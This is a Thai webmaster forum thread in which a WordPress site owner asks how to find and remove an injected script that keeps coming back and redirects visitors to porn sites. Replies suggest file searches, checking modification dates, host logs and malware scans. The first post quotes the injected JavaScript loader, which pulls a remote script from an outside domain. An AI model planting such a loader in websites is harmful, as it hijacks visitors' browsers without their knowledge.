kuzawara
ก๊วนเสียว
พลังน้ำใจ: 1
 ออฟไลน์
กระทู้: 242
|
 |
« เมื่อ: 22 กรกฎาคม 2015, 20:21:52 » |
|
<script type="text/javascript">
var _prvar=_prvar||new Object();
(function(pa,s){if(document.getElementById('pr238904d8'))return false;
pa=document.createElement('script');pa.type='text/javascript';pa.async=true;pa.id='pr238904d8';pa.src='//prscripts.com/pub.js';
s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(pa,s);})();
</script> -------------------------------------------------------- นี่คือสคลิปที่มันฝังไว้ผมลอง view-source จากหน้าแรก แต่ผมหาตำแหน่งที่จะลบไม่เจอครับ ว่าอยู่ที่ไฟล์ไหน มีวิธีหาโค๊ตที่โดนฝังป่าวครับว่าอยู่ที่ไหน  |
|
|
|
« แก้ไขครั้งสุดท้าย: 22 กรกฎาคม 2015, 21:28:48 โดย kuzawara »
|
บันทึกการเข้า
|
|
|
|
toonytoony2004
คนรักเสียว
พลังน้ำใจ: 12
ออฟไลน์
กระทู้: 115
|
|
« ตอบ #1 เมื่อ: 22 กรกฎาคม 2015, 20:29:50 » |
|
ผมเดานะครับว่า อาจอยู่ไฟล์ theme หลักครับ หน้า index หรือเปล่าครับ
|
|
|
|
|
บันทึกการเข้า
|
ชอบทำเว็บ joomla ศึกษาไอที อยากมีความรู้ SEO กำลังจะทำ BLOG ครับ
|
|
|
kuzawara
ก๊วนเสียว
พลังน้ำใจ: 1
ออฟไลน์
กระทู้: 242
|
|
« ตอบ #2 เมื่อ: 22 กรกฎาคม 2015, 21:23:28 » |
|
ผมใช้ Theme ของแท้ครับ หาในไฟล์ index ของ theme ไม่เจอครับ มีวิธีหาโค๊ตแปลกปลอมไหมครับ
|
|
|
|
« แก้ไขครั้งสุดท้าย: 22 กรกฎาคม 2015, 21:26:29 โดย kuzawara »
|
บันทึกการเข้า
|
|
|
|
|
|
toonytoony2004
คนรักเสียว
พลังน้ำใจ: 12
ออฟไลน์
กระทู้: 115
|
|
« ตอบ #4 เมื่อ: 22 กรกฎาคม 2015, 21:30:40 » |
|
ผมเคยใช้ Notepad++ หา โดยใช้คำสั่ง Find in Files
ลองดูครับ
|
|
|
|
|
บันทึกการเข้า
|
ชอบทำเว็บ joomla ศึกษาไอที อยากมีความรู้ SEO กำลังจะทำ BLOG ครับ
|
|
|
kuzawara
ก๊วนเสียว
พลังน้ำใจ: 1
ออฟไลน์
กระทู้: 242
|
|
« ตอบ #5 เมื่อ: 22 กรกฎาคม 2015, 21:43:48 » |
|
ลักษณะพอผมใช้ Theme แท้ ทับไปมันจะหาย แล้วผ่านไปซักระยะหนึ่งมันจะมาอีก ประมาณนี้ครับ
เปลี่ยนพาส FTP ก็แล้ว เปลี่ยนพาสเข้าเว็บก็แล้ว ลง Plugin All In One WP Security ตั้งค่า Full Option ก็แล้วยังโดน
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
pinkam0327
ก๊วนเสียว
พลังน้ำใจ: 31
ออฟไลน์
กระทู้: 441
|
|
« ตอบ #6 เมื่อ: 22 กรกฎาคม 2015, 21:49:45 » |
|
คุ้นๆ เหมือนจะเคยเจอครับ มันจะรีไดเรคไปหน้าอื่นใช่ไหม?
ของผมมันซ้อนไว้ที่ส่วน <head> ครับ อยู่ใต้โค๊ดของ popads.net(โฆษณา) ลองๆหาดูครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
aodify
สมุนแก๊งเสียว
พลังน้ำใจ: 57
ออฟไลน์
กระทู้: 922
|
|
« ตอบ #7 เมื่อ: 22 กรกฎาคม 2015, 21:51:56 » |
|
ลักษณะพอผมใช้ Theme แท้ ทับไปมันจะหาย แล้วผ่านไปซักระยะหนึ่งมันจะมาอีก ประมาณนี้ครับ
เปลี่ยนพาส FTP ก็แล้ว เปลี่ยนพาสเข้าเว็บก็แล้ว ลง Plugin All In One WP Security ตั้งค่า Full Option ก็แล้วยังโดน
ผมเคยโดนลักษณะคล้ายๆ แบบนี้ แต่ไม่ใช้เว็บนี้นะคัรบ เปลี่ยนธีมหาย ใช้ไปสักระยะโค๊ดมันก็จะฝั่งมาในธีมอีก ตอนแรกนึกว่าเป็นที่ตัวโปรแกรม FTP เถื่อนที่ไปหาโหลดมาใช้ เปลี่ยนมาใช้ FileZilla ก็ยังเหมือนเดิม ก็ยังไม่หาย ต้องลบไฟล์ที่เป็น .EXE พวกโปรแกรมต่างๆ ทิ้งทั้งหมด แล้วลงวินโดว์ใหม่ หายเป็นสาบสูญไปเลย |
|
|
|
|
บันทึกการเข้า
|
|
|
|
kuzawara
ก๊วนเสียว
พลังน้ำใจ: 1
ออฟไลน์
กระทู้: 242
|
|
« ตอบ #8 เมื่อ: 22 กรกฎาคม 2015, 22:22:08 » |
|
มันจะรีไดเรคไปหาเว็บต่างๆ ถ้าเข้ากับมือถือเห็นชัดเลยครับ ถ้าเข้ากับ PC มันจะเด้ง Tab ใหม่ไปเว็บโป๊ต่างๆ นาๆ แล้วแต่จะกรุณา ผมมาใช้คอมใหม่วินโดว์ใหม่ Win8 ก็ยังไม่หาย ตอนน้ี้มาใช้โปรแกรม FTP = WinSCP เห็นมีคนบอกว่าปลอดภัย ก็ยังไม่หายอีก ส่วนหาโค๊ตเจอ เอาสกินทับมันหาย แต่เดี๋ยวก็มาอีกครับ เครียดเลย  |
|
|
|
« แก้ไขครั้งสุดท้าย: 22 กรกฎาคม 2015, 22:23:10 โดย kuzawara »
|
บันทึกการเข้า
|
|
|
|
jorjee001
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 542
ออฟไลน์
กระทู้: 4,768
|
|
« ตอบ #9 เมื่อ: 22 กรกฎาคม 2015, 23:34:04 » |
|
ปัญหานี้เป็นไปตั้งแต่เครื่องคอมเจ้าของเว็บเอง ยันเซิฟเวอร์โฮส อาจจะเป็นไวรัสติดจากคอมเจ้าของเว็บเอง หรือจากสคริปที่ถูกฝังบนโฮสก็ได้
ฉะนั้นเช็คและแก้ไวรัสจากคอมเจ้าของเว็บเองก่อน หลังจากนั้นเปลี่ยนพาสทั้งหมด ดูไฟล์ผิดปกติบนโฮส ดูข้อมูลโฮสว่าใช้ซอฟแวร์เก่าไหม มีช่องโหว่ใดๆไหม
แก้กี่ครั้งก็ไม่หายถ้าไม่แก้ที่ต้นเหตุ ไปรอเปลี่ยนกลับมาคือปลายเหตุ แก้แล้วมันก็มาอีกครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
BrainFreeze
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 498
ออฟไลน์
กระทู้: 3,887
|
|
« ตอบ #10 เมื่อ: 23 กรกฎาคม 2015, 05:03:07 » |
|
ถ้าทับไฟล์ไปแล้วหาย รอให้เป็นอีกครั้งครับพอเป็นปุ้บให้ ดู date modify ว่าไฟล์ไหนถูกแก้ล่าสุด ให้ host ช่วยดูก็ได้ครับ พอเจอแล้วขอ log จาก host ครับว่าไฟล์นี้ใคร modify มาจากไหน ทำไมถึงทำได้ครับ  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
AyFOOO
ก๊วนเสียว
พลังน้ำใจ: 25
ออฟไลน์
กระทู้: 219
|
|
« ตอบ #11 เมื่อ: 23 กรกฎาคม 2015, 05:29:31 » |
|
เข้ามาเก็บความรู้ครับ
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
qawe89
ก๊วนเสียว
พลังน้ำใจ: 10
ออฟไลน์
กระทู้: 473
|
|
« ตอบ #12 เมื่อ: 23 กรกฎาคม 2015, 08:27:16 » |
|
อะไรจะโหดร้าย ขนาดนี้  |
|
|
|
|
บันทึกการเข้า
|
|
|
|
สมถะมหาทรัพย์
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 40
ออฟไลน์
กระทู้: 1,204
|
|
« ตอบ #13 เมื่อ: 23 กรกฎาคม 2015, 09:29:14 » |
|
โหดอ่าาาาา
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
dingdong8002
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 543
ออฟไลน์
กระทู้: 4,817
|
|
« ตอบ #14 เมื่อ: 23 กรกฎาคม 2015, 09:44:36 » |
|
ผมเคยเจอกรณีคล้ายๆ กันครั้งหนึ่งครับ ปกติก็ใช้บริการของหลายๆ โฮสเพื่อกระจายความเสี่ยงก็ประมาณ 3-5 เจ้าด้วยกัน แต่เมื่อรู้สึกว่าเจ้าไหนทำท่าไม่ดี ก็จะเตรียมย้ายลองเจ้าอื่นๆ ไปทั่ว พอมาดีเจ้าหนึ่ง เราย้ายยกเว็บเลย แล้วแค่วันสองวัน ก็เหมือนมีสคริปแปลกแทรกเข้ามา เราก็จัดการหามันเลย ก็หาแล้วเจอ ลบไป เปลี่ยนยูสเซอร์ พาสกับบริการที่จำเป็นทั้งหลาย สักพักก็เป็นเหมือนเดิม สรุปได้ทันทีว่าเป็นที่โฮสชัวร์ เป็นที่คอมนี่น่าจะยากมากเพราะเป็นคนรอบคอบ และใช้ Mac OS ด้วยแทบจะ 100% เชื่อได้เลยว่าไม่ได้เป็นจากคอมเรา พอเปลี่ยนโฮสก็หายทันใด  |
|
|
|
|
บันทึกการเข้า
|
✅ โฮสเจ้านี้ ดีและถูกที่สุดแล้ว ล่มยาก ไม่จุกจิก ✓ แชร์โฮส เริ่มที่ 277บาท/ปี, VPS เริ่มที่ 290บาท/เดือน ✓ เซิร์ฟเวอร์มีทั้ง TH,SG,US สนใจ ▶︎ CLICK  ◀︎ |
|
|
teabreak
คนรักเสียว
พลังน้ำใจ: 12
ออฟไลน์
กระทู้: 180
|
|
« ตอบ #15 เมื่อ: 23 กรกฎาคม 2015, 09:51:12 » |
|
ลองสแกนคอมดูยังครับ อาจมาจากโปรแกรมเถื่อนในคอม(ถ้ามี) ผมเคยครั้งนึงใช้ share host ถ้ามีเว็บไหนติดมันลามไปแทบทุกเว็บในโฮสเลยครับ ผมสอบถามโฮสไป โฮสบอกไม่เกี่ยว ลามไปไม่ได้.. อันนี้ผมก็ไม่แน่ใจเหมือนกันว่าลามไปได้มั้ยนะครับ แต่ตั้งแต่นั้นเลิกใช้แชร์โฮสอีกเลยครับ |
|
|
|
|
บันทึกการเข้า
|
|
|
|
tenzamak
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 800
ออฟไลน์
กระทู้: 13,989
|
|
« ตอบ #16 เมื่อ: 23 กรกฎาคม 2015, 10:47:40 » |
|
ผมทำโฮส โดนด่าเรื่องนี้ค่อนข้างบ่อย ถ้ามั่นใจว่าสคิปใหม่ อัพเดทแล้ว
เทสง่ายๆ เปลี่ยนพาสหนีแล้วห้าม login ผมเจอหลายเคสมากกรณีนี้ สุดท้ายคุยกับลูกค้า ผมเปลี่ยนพาสนะ ผมไม่ให้พาสใหม่
เชื่อไหมว่าไม่เคยติดไวรัสอีกเลย update แล้ว ไล่ลบแล้ว ไม่หายก็ควรจะคิดว่าเป็นที่จุดอื่นแล้ว
สแกนคอมสำคัญที่สุด คนชอบมองข้ามกัน ไวรัสพวกนี้มันมากับ ftp ที่คุณใช้
|
|
|
|
|
บันทึกการเข้า
|
|
|
|
kuzawara
ก๊วนเสียว
พลังน้ำใจ: 1
ออฟไลน์
กระทู้: 242
|
|
« ตอบ #17 เมื่อ: 24 กรกฎาคม 2015, 19:35:38 » |
|
ณ ตอนนี้ยังแก้ปัญหาเจ้าตัว ไม่ได้ครับ แก้แล้วก็กลับมาอีก จนปัญญาจริงๆ |
|
|
|
« แก้ไขครั้งสุดท้าย: 24 กรกฎาคม 2015, 19:35:56 โดย kuzawara »
|
บันทึกการเข้า
|
|
|
|
CopterMaster
สมุนแก๊งเสียว
พลังน้ำใจ: 66
ออฟไลน์
กระทู้: 627
|
|
« ตอบ #18 เมื่อ: 24 กรกฎาคม 2015, 20:01:09 » |
|
ทำเว็บอะไรพอจะบอกได้ไหมครับ เผื่อผมมีสคริป จะได้ให้
|
|
|
|
|
บันทึกการเข้า
|
ติด Banner ให้เว็บผม 1 เดือน
แลกกับ สคริปหาเพื่อนออนไลน์ (จ้างเขียน)
สนใจ PM
|
|
|
kuzawara
ก๊วนเสียว
พลังน้ำใจ: 1
ออฟไลน์
กระทู้: 242
|
|
« ตอบ #19 เมื่อ: 24 กรกฎาคม 2015, 20:39:47 » |
|
แนว 18+ ครับ แก้ยังงัยก็ไม่ได้ครับ ผมใช้โปรแกรม winscp หรือเป็นที่โปรแกรมตัวนี้ครับ โปรแกรมไวรัสของแท้ Nod32,theme wordpress ของแท้ก็ยังไม่ได้ |
|
|
|
« แก้ไขครั้งสุดท้าย: 24 กรกฎาคม 2015, 20:42:26 โดย kuzawara »
|
บันทึกการเข้า
|
|
|
|
|
ความรู้ทั่วไป
